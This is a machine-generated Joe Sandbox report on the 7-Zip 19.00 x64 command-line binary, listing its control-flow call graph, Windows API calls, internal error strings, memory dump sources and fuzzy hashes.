1d8691 free 27575->27576 27576->27256 27578->27292 27579->27335 27580->27211 27581->27222 27582->27252 27583->27293 27584->27324 27585->27349 27586->27372 27587->27360 27588->27385 27589->27390 27590->27391 27591->27395 27592->27210 27593->27298 27594->27339 27595->27283 27596->27365 27597->27379 27598->27356 27599->27405 27601->27427 27602->27419 27603->27403 27605 1d794c FindClose 27604->27605 27607 1d799b 27605->27607 27606 1d7a13 27606->27478 27607->27606 27608 1d79c3 27607->27608 27609 1d79b2 FindFirstFileW 27607->27609 27610 1d7a0d 27608->27610 27612 1d3208 2 API calls 27608->27612 27609->27608 27610->27606 27611 1d339c 4 API calls 27610->27611 27611->27606 27613 1d79d7 27612->27613 27614 1da7ec 35 API calls 27613->27614 27615 1d79ec 27614->27615 27616 1d79f0 FindFirstFileW 27615->27616 27617 1d7a03 free 27615->27617 27616->27617 27617->27610 27619 1d7968 27618->27619 27620 1d795b FindClose 27618->27620 27619->27465 27620->27619 27621->27460 27622->27476 27623->27518 27624->27518 27625->27518 27627 1d7d64 27626->27627 27628 1d7d79 27627->27628 27629 1d7d6b GetFileAttributesW 27627->27629 27630 1d7dc5 27628->27630 27631 1d3208 2 API calls 27628->27631 27629->27628 27629->27630 27630->27467 27630->27473 27632 1d7d87 27631->27632 27633 1da7ec 35 API calls 27632->27633 27634 1d7d9c 27633->27634 27635 1d7dbb free 27634->27635 27636 1d7da0 GetFileAttributesW free 27634->27636 27635->27630 27636->27630 27638 1d2fbc 2 API calls 27637->27638 27639 1d3154 memmove memmove 27638->27639 27639->27563 27640 21e1a6 27641 21e1bd __set_app_type 27640->27641 27642 21e201 27641->27642 27643 21e217 _initterm __getmainargs _initterm 27642->27643 27644 21e28c 27643->27644 27645 21e2a3 27644->27645 27646 21e29b _cexit 27644->27646 27646->27645 27647 21ab29 27648 21abd1 27647->27648 27651 210524 SetConsoleCtrlHandler 27648->27651 27652 1f9a34 27653 1f9a9e 27652->27653 27654 1f9a54 27652->27654 27654->27653 27655 1f9a80 free 27654->27655 27658 1d6464 27655->27658 27659 1d6475 
FreeLibrary 27658->27659 27660 1d647f free 27658->27660 27659->27660 27660->27654 27661 2049b0 27681 1fcd8c 27661->27681 27663 1d3208 2 API calls 27664 2049e7 27663->27664 27666 1d3208 2 API calls 27664->27666 27667 2049f2 27666->27667 27671 204a25 27667->27671 27688 1d6e30 27667->27688 27672 204a57 free free 27671->27672 27675 204a72 27671->27675 27674 204b22 27672->27674 27673 204b0a free free 27673->27674 27675->27673 27676 1d318c 4 API calls 27675->27676 27677 1d2130 2 API calls 27675->27677 27678 1d3314 3 API calls 27675->27678 27679 1db8f0 4 API calls 27675->27679 27676->27675 27677->27675 27678->27675 27680 204ade free 27679->27680 27680->27675 27682 1d3208 2 API calls 27681->27682 27683 1fcddd 27682->27683 27684 1d3208 2 API calls 27683->27684 27685 1fcdf0 27684->27685 27686 1d3208 2 API calls 27685->27686 27687 1fcdfe 27686->27687 27687->27663 27689 1d6e47 27688->27689 27690 1d6e59 27689->27690 27691 1d339c 4 API calls 27689->27691 27692 1d339c 4 API calls 27690->27692 27691->27690 27693 1d6e73 27692->27693 27694 1fcf80 27693->27694 27695 1d3404 4 API calls 27694->27695 27696 1fcfa1 27695->27696 27697 1d318c 4 API calls 27696->27697 27698 1fcfb2 27697->27698 27699 1d7ebc 90 API calls 27698->27699 27700 1fcfbf free 27699->27700 27701 1fcfec 27700->27701 27702 1fcfd2 _CxxThrowException 27700->27702 27703 1fd02a 27701->27703 27704 1fd015 free free 27701->27704 27702->27701 27703->27671 27704->27701 27705 1e1e0c 27706 1e1e30 27705->27706 27707 1e1e3f 27705->27707 27706->27707 27709 210a1c EnterCriticalSection 27706->27709 27710 210a60 LeaveCriticalSection 27709->27710 27711 210a53 27709->27711 27710->27707 27713 21b480 27711->27713 27714 21b4a7 27713->27714 27715 21b49e GetTickCount 27713->27715 27718 21b4d8 strcmp 27714->27718 27724 21b50c 27714->27724 27745 21b7aa 27714->27745 27715->27714 27719 21b4ec 27718->27719 27718->27724 27721 21b4f7 wcscmp 27719->27721 27719->27724 27720 21b575 27760 1d2cdc 27720->27760 27721->27724 27722 21b55e strcmp 27722->27720 
27722->27745 27724->27745 27754 21b264 27724->27754 27725 21b714 27729 21b72c 27725->27729 27730 21b71c strcmp 27725->27730 27726 21b584 27727 21b5c8 27726->27727 27774 1d2db8 27726->27774 27734 21b5fd 27727->27734 27778 1d2e04 malloc _CxxThrowException memmove free _CxxThrowException 27727->27778 27765 21b1c8 27729->27765 27730->27729 27732 21b76a 27730->27732 27736 1d2cdc 3 API calls 27732->27736 27734->27725 27735 1d3404 4 API calls 27734->27735 27738 21b646 27735->27738 27739 21b79a 27736->27739 27779 1d2438 9 API calls 27738->27779 27744 1d3404 4 API calls 27739->27744 27740 21b752 27784 1d22e4 fflush 27740->27784 27741 21b75e 27743 1d2cdc 3 API calls 27741->27743 27743->27732 27744->27745 27745->27710 27747 21b6f0 27783 1d2e04 malloc _CxxThrowException memmove free _CxxThrowException 27747->27783 27749 1d3404 4 API calls 27752 21b663 27749->27752 27752->27747 27752->27749 27780 1d38c8 memmove 27752->27780 27781 1d3a64 6 API calls 27752->27781 27782 1d2438 9 API calls 27752->27782 27755 21b27e 27754->27755 27756 21b2a8 strlen 27755->27756 27758 21b2c9 27756->27758 27757 1d2db8 5 API calls 27759 21b305 27757->27759 27758->27757 27759->27720 27759->27722 27761 1d2d11 27760->27761 27762 1d2cf0 27760->27762 27761->27726 27762->27761 27763 1d2130 2 API calls 27762->27763 27764 1d2d00 free 27763->27764 27764->27761 27766 21b1e2 27765->27766 27767 21b238 27765->27767 27769 21b1f3 27766->27769 27785 1d2b04 malloc _CxxThrowException _CxxThrowException free 27766->27785 27768 21b249 fputs 27767->27768 27786 1d22e4 fflush 27767->27786 27768->27740 27768->27741 27772 21b215 fputs 27769->27772 27773 21b205 memset 27769->27773 27772->27767 27773->27772 27775 1d2dcd 27774->27775 27787 1d2b9c 27775->27787 27778->27734 27779->27752 27780->27752 27781->27752 27782->27752 27783->27725 27784->27741 27785->27769 27786->27768 27788 1d2bae 27787->27788 27789 1d2bc3 27787->27789 27791 1d2a9c malloc _CxxThrowException memmove free _CxxThrowException 27788->27791 27789->27727 
27791->27789 27792 218817 27793 21882c 27792->27793 27794 21881c fputs 27792->27794 27938 1e0dcc 27793->27938 27794->27793 27796 218841 27797 218899 27796->27797 27798 218878 GetStdHandle GetConsoleScreenBufferInfo 27796->27798 27799 1d2130 2 API calls 27797->27799 27798->27797 27800 2188ac 27799->27800 28048 217c40 27800->28048 27804 2189a2 27805 2189a7 _CxxThrowException 27804->27805 27810 2189c3 27804->27810 27805->27810 27806 218a78 28092 204c2c 27806->28092 27808 218a54 _CxxThrowException 27808->27806 27810->27806 27810->27808 28113 1d32bc 27810->28113 27812 218aad _CxxThrowException 27829 218ad1 27812->27829 27815 1d362c 6 API calls 27818 218a2a 27815->27818 27816 218bb3 27822 218c21 27816->27822 28119 1dbf04 22 API calls 27816->28119 27821 1d3314 3 API calls 27818->27821 27819 218bb8 _CxxThrowException 27819->27816 27820 218c00 27820->27822 27823 218c05 _CxxThrowException 27820->27823 27824 218a3f _CxxThrowException 27821->27824 28105 1d2300 fputc 27822->28105 27823->27822 27824->27808 27827 218c58 fputs 28106 1d2300 fputc 27827->28106 27828 218b98 free 27828->27816 27828->27829 27829->27816 27829->27819 27829->27828 28117 1f9644 11 API calls 27829->28117 28118 1de9c8 malloc _CxxThrowException memmove free memmove 27829->28118 27831 218cbc 28107 1d2300 fputc 27831->28107 27834 218cc4 fputs 28108 1d2300 fputc 27834->28108 27838 218cdc strlen 27840 21902b 27838->27840 27841 218d08 27838->27841 27839 218c70 27839->27831 28120 21640c fputc fputs fputs fputc 27839->28120 28121 1d2300 fputc 27839->28121 28109 1d2300 fputc 27840->28109 28122 21640c fputc fputs fputs fputc 27841->28122 27844 21903b fputs 28110 1d2300 fputc 27844->28110 27852 21906d fputs fputc 27855 219053 27852->27855 27856 219096 fputc 27852->27856 27855->27852 27896 21914d 27855->27896 28123 1d2670 fputs 27855->28123 27857 2190ae fputc fputc fputc 27856->27857 27862 219100 27857->27862 27861 2192ab 28111 1d2300 fputc 27861->28111 28124 2163b8 fputc fputs 27862->28124 27864 2192b3 fputs 28112 
1d2300 fputc 27864->28112 27875 2192e2 fputs fputc 27878 2192cb 27875->27878 27878->27875 27914 219395 27878->27914 28132 2163b8 fputc fputs 27878->28132 27882 219489 27889 21a5c5 27882->27889 27893 21a5c0 27882->27893 27884 2191a2 fputc 27884->27896 27894 21a5e7 free 27889->27894 27895 21a5ca _CxxThrowException 27889->27895 28136 2166a8 30 API calls 27893->28136 27899 21a605 27894->27899 27900 21a626 free 27894->27900 27895->27894 27896->27861 27896->27884 27901 2191c4 fputc 27896->27901 27910 2191e4 fputc fputc 27896->27910 28125 21640c fputc fputs fputs fputc 27896->28125 28126 1f89f0 VariantClear 27896->28126 28127 1d2670 fputs 27896->28127 27906 21a609 free 27899->27906 27907 21a63c 27900->27907 27901->27896 27906->27900 27906->27906 28137 217080 6 API calls 27907->28137 28128 1f8a78 VariantClear 27910->28128 27914->27882 28133 21640c fputc fputs fputs fputc 27914->28133 28134 1f8d38 VariantClear 27914->28134 28135 2163b8 fputc fputs 27914->28135 27915 21a64a 28138 1d182c free free free free free 27915->28138 27922 219218 28129 2163b8 fputc fputs 27922->28129 28130 1f8b00 malloc _CxxThrowException free VariantClear 27922->28130 27927 21926c fputc fputs 28131 1d2300 fputc 27927->28131 27931 21928f free 27931->27861 27931->27896 27939 1e0e1b 27938->27939 27940 1e0df5 27938->27940 27942 1d3314 3 API calls 27939->27942 28202 1f02a0 6 API calls 27940->28202 27944 1e0e2c 27942->27944 27943 1e0e09 _CxxThrowException 27943->27939 27945 1e0e4e free 27944->27945 27948 1e0e98 free 27944->27948 28203 1f02a0 6 API calls 27945->28203 27947 1e0e6e _CxxThrowException 27947->27944 27950 1e0ede 27948->27950 27951 1e0ece 27948->27951 27953 1e0f29 wcscmp 27950->27953 27955 1e0f3e 27950->27955 27952 1d4b58 7 API calls 27951->27952 27952->27950 27954 1e0f7b 27953->27954 27953->27955 28204 1f02a0 6 API calls 27954->28204 28139 1dfadc 27955->28139 27957 1e0f8f _CxxThrowException 27957->27955 27960 1dfadc 10 API calls 27961 1e0fee 27960->27961 27962 1e102d 27961->27962 28205 1e0358 
189 API calls 27961->28205 27966 1e105c 27962->27966 28206 1e0358 189 API calls 27962->28206 27965 1e1177 28149 1e0160 27965->28149 27966->27965 27967 1e1130 27966->27967 28207 1f02a0 6 API calls 27966->28207 27970 1d3404 4 API calls 27967->27970 27973 1e1141 27970->27973 27972 1e111e _CxxThrowException 27972->27967 27973->27965 28208 1f02a0 6 API calls 27973->28208 27974 1e11f1 27976 1e121e 27974->27976 27977 1d3404 4 API calls 27974->27977 27975 1d3404 4 API calls 27975->27974 28166 1d4b58 27976->28166 27977->27976 27981 1e1165 _CxxThrowException 27981->27965 27984 1e1871 27987 1e18cf 27984->27987 27988 1e1876 27984->27988 27985 1e15e9 28215 1e0998 72 API calls 27985->28215 27986 1e159a 27986->27985 27995 1e1807 27986->27995 28214 1f02a0 6 API calls 27986->28214 27994 1e18d8 _CxxThrowException 27987->27994 28047 1e14fb 27987->28047 27992 1d63d0 57 API calls 27988->27992 27989 1e12d9 28188 1d63d0 27989->28188 27998 1e1882 27992->27998 27995->27984 27995->28047 28233 1f02a0 6 API calls 27995->28233 27996 1e15d7 _CxxThrowException 27996->27985 27997 1e15f8 28216 1def70 27997->28216 28001 1d6360 15 API calls 27998->28001 28004 1e188b 28001->28004 28006 1d4b58 7 API calls 28004->28006 28005 1e185f _CxxThrowException 28005->27984 28006->28047 28009 1e13b2 28011 1e13ed 28009->28011 28210 1e0358 189 API calls 28009->28210 28015 1e141f 28011->28015 28211 1e0358 189 API calls 28011->28211 28012 1e16c8 28016 1e17a8 28012->28016 28021 1e1736 28012->28021 28229 1f02a0 6 API calls 28012->28229 28013 1e13a0 _CxxThrowException 28013->28009 28022 1e143e 28015->28022 28212 1d5164 6 API calls 28015->28212 28020 1e17ca 28016->28020 28023 1d3404 4 API calls 28016->28023 28017 1d3404 4 API calls 28018 1e169d 28017->28018 28018->28012 28228 1d3890 memmove 28018->28228 28020->28047 28232 1f02a0 6 API calls 28020->28232 28021->28016 28028 1e1767 28021->28028 28230 1f02a0 6 API calls 28021->28230 28026 1d63d0 57 API calls 28022->28026 28023->28020 28029 1e144c 28026->28029 28027 1e1724 
_CxxThrowException 28027->28021 28028->28016 28231 1f02a0 6 API calls 28028->28231 28198 1f408c 28029->28198 28035 1e17f5 _CxxThrowException 28035->27995 28036 1e1755 _CxxThrowException 28036->28028 28038 1e1796 _CxxThrowException 28038->28016 28039 1d6360 15 API calls 28040 1e1464 28039->28040 28041 1d3404 4 API calls 28040->28041 28043 1e1483 28040->28043 28041->28043 28042 1e14d9 28045 1d3404 4 API calls 28042->28045 28042->28047 28043->28042 28043->28047 28213 1f02a0 6 API calls 28043->28213 28045->28047 28046 1e14c7 _CxxThrowException 28046->28042 28047->27796 28049 1d3208 2 API calls 28048->28049 28050 217c84 28049->28050 28051 1fab74 28050->28051 28052 1faba6 28051->28052 28084 1fabd3 28051->28084 28052->28084 28385 1f94a8 7 API calls 28052->28385 28053 1fae31 28282 1f83c8 28053->28282 28057 1d3208 malloc _CxxThrowException 28057->28084 28060 1d3518 malloc _CxxThrowException free 28060->28084 28064 1fae7f 28067 1fae99 28064->28067 28068 1d339c 4 API calls 28064->28068 28065 1fae7a 28066 1faf7a free 28065->28066 28066->27804 28069 1d31c0 4 API calls 28067->28069 28068->28067 28070 1faeaf 28069->28070 28366 1fa9fc 28070->28366 28075 1faed1 28076 1d31c0 4 API calls 28075->28076 28077 1faee7 28076->28077 28079 1fa9fc 126 API calls 28077->28079 28080 1faef3 free 28079->28080 28080->28065 28085 1faf06 28080->28085 28081 1d2130 malloc _CxxThrowException 28081->28084 28082 1db8f0 malloc _CxxThrowException memmove free 28082->28084 28084->28053 28084->28057 28084->28060 28084->28081 28084->28082 28086 1fadc2 memmove 28084->28086 28087 1fad95 free 28084->28087 28386 1f9d98 28084->28386 28405 1fa034 8 API calls 28084->28405 28406 1f9af0 28084->28406 28413 1f94a8 7 API calls 28084->28413 28085->28065 28090 1faf38 28085->28090 28086->28084 28087->28084 28088 1faf3b GetProcAddress 28088->28090 28090->28088 28091 1faf71 28090->28091 28091->28065 28091->28066 28093 204c5c 28092->28093 28101 204c79 28092->28101 28094 204c60 free 28093->28094 28094->28094 28094->28101 28096 
204d9e free 28104 204d9c 28096->28104 28098 204dac free 28098->28104 28099 1d2130 2 API calls 28099->28101 28100 204d63 memmove 28100->28101 28101->28096 28101->28098 28101->28099 28101->28100 28102 1db8f0 4 API calls 28101->28102 28101->28104 28540 1d9a80 malloc _CxxThrowException memmove 28101->28540 28541 1fbb68 16 API calls 28101->28541 28103 204d86 free 28102->28103 28103->28101 28103->28104 28104->27812 28104->27829 28105->27827 28106->27839 28107->27834 28108->27838 28109->27844 28110->27855 28111->27864 28112->27878 28114 1d32d0 28113->28114 28115 1d2fbc 2 API calls 28114->28115 28116 1d32e4 28115->28116 28116->27815 28117->27829 28118->27829 28119->27820 28121->27839 28123->27857 28126->27896 28127->27896 28128->27922 28130->27927 28131->27931 28134->27914 28136->27889 28137->27915 28140 1dfb08 28139->28140 28141 1dfb00 28139->28141 28142 1d3314 3 API calls 28140->28142 28141->27960 28143 1dfb21 28142->28143 28144 1dfb3f free 28143->28144 28146 1dfb4f 28143->28146 28144->28141 28148 1dfbb4 free 28146->28148 28234 1f02a0 6 API calls 28146->28234 28147 1dfba2 _CxxThrowException 28147->28148 28148->28141 28150 1e018f 28149->28150 28151 1d32bc 2 API calls 28150->28151 28161 1e01e4 28150->28161 28153 1e01b0 28151->28153 28152 1e0325 28152->27974 28152->27975 28235 1ded8c 6 API calls 28153->28235 28155 1e02ca 28239 1f02a0 6 API calls 28155->28239 28156 1e01d1 free 28156->28161 28158 1e02de _CxxThrowException 28159 1e02c8 28158->28159 28159->28152 28240 1f02a0 6 API calls 28159->28240 28161->28152 28161->28155 28161->28159 28236 1dfec8 142 API calls 28161->28236 28237 1dfd30 12 API calls 28161->28237 28238 1ded8c 6 API calls 28161->28238 28165 1e0313 _CxxThrowException 28165->28152 28167 1d4b7f 28166->28167 28168 1d4b77 28166->28168 28169 1d4bb6 28167->28169 28171 1d4ba1 free free 28167->28171 28178 1e0c20 28168->28178 28170 1d4bfd 28169->28170 28172 1d2130 2 API calls 28169->28172 28170->28168 28174 1d2130 2 API calls 28170->28174 28177 1d3314 3 API calls 
28170->28177 28171->28167 28173 1d4bd3 28172->28173 28175 1d4bdc memmove 28173->28175 28176 1d4bef free 28173->28176 28174->28170 28175->28176 28176->28170 28177->28170 28179 1e0d37 28178->28179 28181 1e0c4a 28178->28181 28179->27986 28179->27989 28180 1d3208 malloc _CxxThrowException 28180->28181 28181->28179 28181->28180 28182 1d3404 4 API calls 28181->28182 28183 1d339c 4 API calls 28181->28183 28184 1d2130 2 API calls 28181->28184 28185 1d3314 malloc _CxxThrowException memmove 28181->28185 28186 1db8f0 4 API calls 28181->28186 28182->28181 28183->28181 28184->28181 28185->28181 28187 1e0d0d free free 28186->28187 28187->28179 28187->28181 28189 1d6419 28188->28189 28190 1d63e5 28188->28190 28191 1d6451 28189->28191 28193 1d643c free free 28189->28193 28190->28189 28241 1d5d18 55 API calls 28190->28241 28194 1d6360 28191->28194 28193->28189 28196 1d6379 28194->28196 28195 1d63c4 28195->28009 28209 1f02a0 6 API calls 28195->28209 28196->28195 28242 1d5bbc 15 API calls 28196->28242 28199 1f409e 28198->28199 28200 1e1458 28198->28200 28199->28200 28243 1f3e14 28199->28243 28200->28039 28202->27943 28203->27947 28204->27957 28205->27962 28206->27966 28207->27972 28208->27981 28209->28013 28210->28011 28211->28015 28212->28022 28213->28046 28214->27996 28215->27997 28217 1def99 28216->28217 28218 1def91 28216->28218 28219 1defd9 28217->28219 28220 1defbb free free free 28217->28220 28218->28012 28218->28017 28221 1d2130 2 API calls 28219->28221 28226 1df020 28219->28226 28220->28217 28222 1deff6 28221->28222 28224 1defff memmove 28222->28224 28225 1df012 free 28222->28225 28223 1d2130 2 API calls 28223->28226 28224->28225 28225->28226 28226->28218 28226->28223 28227 1d3314 malloc _CxxThrowException memmove 28226->28227 28227->28226 28228->28012 28229->28027 28230->28036 28231->28038 28232->28035 28233->28005 28234->28147 28235->28156 28236->28161 28237->28161 28238->28161 28239->28158 28240->28165 28241->28190 28242->28196 28261 1f1370 28243->28261 28246 1f1370 96 
API calls 28248 1f3e45 28246->28248 28247 1f4043 28247->28199 28253 1f3ea2 28248->28253 28265 1f01a8 28248->28265 28250 1d318c 4 API calls 28251 1f3fdd 28250->28251 28251->28247 28251->28250 28256 1f3e14 105 API calls 28251->28256 28281 1eff04 malloc _CxxThrowException memmove 28251->28281 28253->28251 28255 1d520c malloc _CxxThrowException memmove memmove free 28253->28255 28258 1f3f6b memmove 28253->28258 28279 1d2748 CharUpperW CharUpperW 28253->28279 28280 1d5424 6 API calls 28253->28280 28255->28253 28257 1f4022 free free 28256->28257 28257->28247 28257->28251 28258->28253 28262 1f13dd 28261->28262 28263 1f1388 28261->28263 28262->28246 28263->28262 28264 1f01a8 96 API calls 28263->28264 28264->28263 28266 1f0259 28265->28266 28267 1f01c8 28265->28267 28266->28248 28267->28266 28268 1d3208 2 API calls 28267->28268 28269 1f01ec 28268->28269 28270 1d318c 4 API calls 28269->28270 28271 1f01fd 28270->28271 28272 1f020c free free 28271->28272 28273 1f0223 28271->28273 28272->28266 28274 1d7ebc 90 API calls 28273->28274 28275 1f0232 28274->28275 28276 1f0244 free free 28275->28276 28277 1d3404 4 API calls 28275->28277 28276->28266 28278 1f0243 28277->28278 28278->28276 28279->28253 28281->28251 28414 1d6570 28282->28414 28285 1d31c0 4 API calls 28286 1f8406 28285->28286 28287 1d8624 91 API calls 28286->28287 28288 1f841b 28287->28288 28289 1d31c0 4 API calls 28288->28289 28310 1f8479 28288->28310 28290 1f8435 28289->28290 28421 1d86dc 91 API calls 28290->28421 28291 1f848b free 28292 1f8499 28291->28292 28294 1f849f free 28292->28294 28295 1f84ad 28292->28295 28294->28295 28296 1f84bd 28295->28296 28297 1f84b3 free 28295->28297 28299 1f85ef 28296->28299 28300 1d3208 2 API calls 28296->28300 28297->28296 28298 1f844a 28301 1d31c0 4 API calls 28298->28301 28298->28310 28302 1d3314 3 API calls 28299->28302 28304 1f84d0 28300->28304 28305 1f8464 28301->28305 28303 1f85fc free 28302->28303 28306 1f860a 28303->28306 28423 1f8290 102 API calls 28304->28423 28422 1d86dc 91 
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
• String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
• API String ID: 3442115484-272389550
• Opcode ID: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
• Instruction ID: 9539176c3f457f9e5108b4fef13b5db2fddadbb57c360f80ebc189044a5f6f56
• Opcode Fuzzy Hash: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
• Instruction Fuzzy Hash: 7872B472214AC196DB74EF25E5943EE73A1F7A8B80F408122DBAA47758DF3CC599CB40
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ExceptionThrowmallocmemmove
• String ID:
• API String ID: 3352498445-0
• Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
• Instruction ID: 127f561f90bbd578badf28e2aa65a6be7f0d70df10b3245b4ba776d5cc46da54
• Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
• Instruction Fuzzy Hash: A8826D32218A8886CB30EF25E4903BEB360F7E5B94F544126EBAD57B59DF78C945CB10

Control-flow Graph

APIs
Strings
• Can not create output directory: , xrefs: 001F4E83
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove$ErrorExceptionLastThrow
• String ID: Can not create output directory:
• API String ID: 4159955631-3123869724
• Opcode ID: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
• Instruction ID: c04ac1099e3031d672d5cf941f95d081f999c0ec4e05742d2a6c929ff380a024
• Opcode Fuzzy Hash: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
• Instruction Fuzzy Hash: C1426C32219AC496CB30EF25E8903AEB361F7E6B80F585122DB9D43B59DF38D955CB00

Control-flow Graph
APIs
Strings
Similarity
• API ID: free$ExceptionThrow$memset
• String ID: can't decompress folder$there is no such archive
• API String ID: 4182836161-2069749860
• Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
• Instruction ID: 934c75cfa3e973a62d665c9d6ae67d23b7482d93eea55f414f1bffbf9ef463ed
• Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
• Instruction Fuzzy Hash: 29526A33209AC486CB24EF25E4843AEB761F79AB94F455122DF9E53B29DF38C855CB00
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
• Instruction ID: 054a8843d0f483835707f154c469ab320af517d9ee66e234d45d924c9354c278
• Opcode Fuzzy Hash: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
• Instruction Fuzzy Hash: 8042AF3B219AC486CB24DF25E0946BF7765F79AB88F455016EB5E43B16CF78C88AC700
APIs
Strings
• Unsupported command:, xrefs: 001E0E57
• The command must be specified, xrefs: 001E0DF5
• Cannot find archive name, xrefs: 001E110A
• -ai switch is not supported for this command, xrefs: 001E15C3
• Cannot use absolute pathnames for this command, xrefs: 001E138C
• Incorrect Number of benmchmark iterations, xrefs: 001E1847
• Unsupported -spf:, xrefs: 001E0F7E
• I won't write compressed data to a terminal, xrefs: 001E1741
• Only one archive can be created with rename command, xrefs: 001E17E1
• Archive name cannot by empty, xrefs: 001E1151
• I won't write data and program's messages to same stream, xrefs: 001E14B3, 001E1782
• stdout mode and email mode cannot be combined, xrefs: 001E1710
Similarity
• API ID: ExceptionThrow$free$wcscmp
• String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
• API String ID: 1252877886-1892825451
• Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
• Instruction ID: c685a178a54e7a970e6642efa50ab05c8e41472b7f266b41fa8f4dce0a2c90cb
• Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
• Instruction Fuzzy Hash: 3452E273304AC5A7DB29CF2AD5943AEBB61F359744F888026DB9903B12DB78D5B8C700
APIs
Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                                • API String ID: 1313864721-2333288578
                                                                                                                                                                                                                                • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                • Instruction ID: 41cf4ce46da1a64c128f820b0cb92381b3c9fc3c63f22caac82500d5ad244356
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3115172204F80E2DA41CB52FE583ADB3A6FBD8B81F940412EA9F42A58CF7CC549C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 001DAC84
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32 ref: 001DAC95
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32 ref: 001DACA9
                                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACE0
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACEA
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 001DACFA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
